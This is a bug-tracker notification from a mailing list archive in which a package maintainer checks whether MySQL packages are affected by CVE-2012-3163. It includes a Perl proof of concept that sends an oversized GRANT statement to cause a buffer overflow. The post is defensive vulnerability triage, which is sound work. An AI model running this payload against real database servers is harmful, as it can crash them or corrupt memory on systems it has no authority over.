ius-coredev team mailing list archive

Thread
Date

[Bug 1088513] Re: MySQL - CVE-2012-3163: Identify if IUS Packages are vulnerable

To: ius-coredev@xxxxxxxxxxxxxxxxxxx
From: Jeffrey Ness <1088513@xxxxxxxxxxxxxxxxxx>
Date: Mon, 10 Dec 2012 15:32:14 -0000
Reply-to: Bug 1088513 <1088513@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Attempting to identify issue using Perl script found at
http://seclists.org/fulldisclosure/2012/Dec/4

[code]
#!/usr/bin/perl

  use strict;
  use DBI();

  # Connect to the database.
  print "== Connecting to database ==\n";
  my $dbh = DBI->connect("DBI:mysql:database=test;host=localhost;",
                         "jeffrey", "secret",
                         {'RaiseError' => 1});
  print "== Connected ==\n";


  print "== Creating large string for buffer overflow ==\n";
  $a ="A" x 100000;

  print "== Attempting to grant with large string ==\n";
  my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");

  $sth->execute();
[/code]

-- 
You received this bug notification because you are a member of IUS Core
Development, which is subscribed to IUS Community Project.
https://bugs.launchpad.net/bugs/1088513

Title:
  MySQL - CVE-2012-3163: Identify if IUS Packages are vulnerable

Status in IUS Community Project:
  Won't Fix

Bug description:
  Redhat Bug Report:

       https://bugzilla.redhat.com/show_bug.cgi?id=881064#c6

To manage notifications about this bug go to:
https://bugs.launchpad.net/ius/+bug/1088513/+subscriptions

References

[Bug 1088513] [NEW] MySQL - CVE-2012-3163: Identify if IUS Packages are vulnerable
From: Jeffrey Ness, 2012-12-10